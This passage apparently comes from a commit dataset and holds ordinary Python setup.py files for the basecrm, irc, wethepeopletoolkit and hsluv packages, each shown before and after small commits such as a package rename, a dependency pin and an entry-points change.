'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| Update package name to basecrm | Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages).
| Python | mit | yunojuno/django-basecrm | # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages). | # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| <commit_before># -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
<commit_msg>Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages).<commit_after> | # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| # -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages).# -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| <commit_before># -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm-python",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
<commit_msg>Update package name to basecrm
Was basecrm-python, but it's a Python package, uploaded to PyPI, so
the suffix is redundant. It's maintained in the root folder name as
this makes it relevant in Github (and distinct from other languages).<commit_after># -*- coding: utf-8 -*-
"""Setup file for basecrm library."""
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name="basecrm",
version="0.1",
packages=[
'basecrm',
],
install_requires=['requests'],
include_package_data=True,
description='Base CRM API client, Python edition.',
long_description=README,
url='https://github.com/yunojuno/basecrm-python',
author='Hugo Rodger-Brown',
author_email='hugo@yunojuno.com',
maintainer='Hugo Rodger-Brown',
maintainer_email='hugo@yunojuno.com',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
|
b4ff3790fcefe070d13efed01247e94cbe87bd43 | setup.py | setup.py | import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| Use hgtools 5 or later for use_vcs_version | Use hgtools 5 or later for use_vcs_version
| Python | mit | jaraco/irc | import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
Use hgtools 5 or later for use_vcs_version | import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| <commit_before>import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
<commit_msg>Use hgtools 5 or later for use_vcs_version<commit_after> | import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
Use hgtools 5 or later for use_vcs_versionimport sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
| <commit_before>import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_hg_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
<commit_msg>Use hgtools 5 or later for use_vcs_version<commit_after>import sys
import setuptools
def read_long_description():
with open('README.rst') as f:
data = f.read()
with open('CHANGES.rst') as f:
data += '\n\n' + f.read()
return data
importlib_req = ['importlib'] if sys.version_info < (2,7) else []
argparse_req = ['argparse'] if sys.version_info < (2,7) else []
setup_params = dict(
name="irc",
description="IRC (Internet Relay Chat) protocol client library for Python",
long_description=read_long_description(),
use_vcs_version=True,
packages=setuptools.find_packages(),
author="Joel Rosdahl",
author_email="joel@rosdahl.net",
maintainer="Jason R. Coombs",
maintainer_email="jaraco@jaraco.com",
url="http://python-irclib.sourceforge.net",
license="MIT",
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
],
install_requires=[
'six',
'jaraco.util',
] + importlib_req + argparse_req,
setup_requires=[
'hgtools>=5',
'pytest-runner',
],
tests_require=[
'pytest',
'mock',
],
)
if __name__ == '__main__':
setuptools.setup(**setup_params)
|
76dc4637d41b7c32f00a0cc1ab0a8af9b463524d | setup.py | setup.py | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
) | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) | Change how console_scripts is invoked | Change how console_scripts is invoked
| Python | mit | alexpeattie/wethepeopletoolkit | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
)Change how console_scripts is invoked | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) | <commit_before>from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
)<commit_msg>Change how console_scripts is invoked<commit_after> | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) | from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
)Change how console_scripts is invokedfrom setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) | <commit_before>from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.3",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.3.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points='''
[console_scripts]
wethepeopletoolkit=wethepeopletoolkit:cli
'''
)<commit_msg>Change how console_scripts is invoked<commit_after>from setuptools import setup
import sys
try:
from PyQt4.QtCore import QT_VERSION_STR
except ImportError:
sys.exit("PyQt4 is required to install this package (see README.md for installation instructions)")
setup(
name = "wethepeopletoolkit",
version = "1.4",
author = "Alex Peattie",
author_email = "me@alexpeattie.com",
description = ("A project for analyzing and visualizing data from the Obama-era 'We the People' petitions site."),
license = "MIT",
keywords = "wethepeople petitions datascience analysis",
url = "https://github.com/alexpeattie/wethepeopletoolkit",
download_url = 'https://github.com/alexpeattie/wethepeopletoolkit/archive/1.4.tar.gz',
install_requires=[
'bs4',
'click',
'pandas',
'numpy',
'bitstring',
'base58',
'matplotlib',
'findspark',
'sklearn',
'scipy'
],
pymodules=['wethepeopletoolkit'],
entry_points= {
'console_scripts': ['wethepeopletoolkit = wethepeopletoolkit:cli']
}
) |
618138eaac7463b9e2afd6e8d28c2e27cf294f87 | setup.py | setup.py | #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| Add official support for Python 3.10 | Add official support for Python 3.10
| Python | mit | hsluv/hsluv-python,husl-colors/husl.py | #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
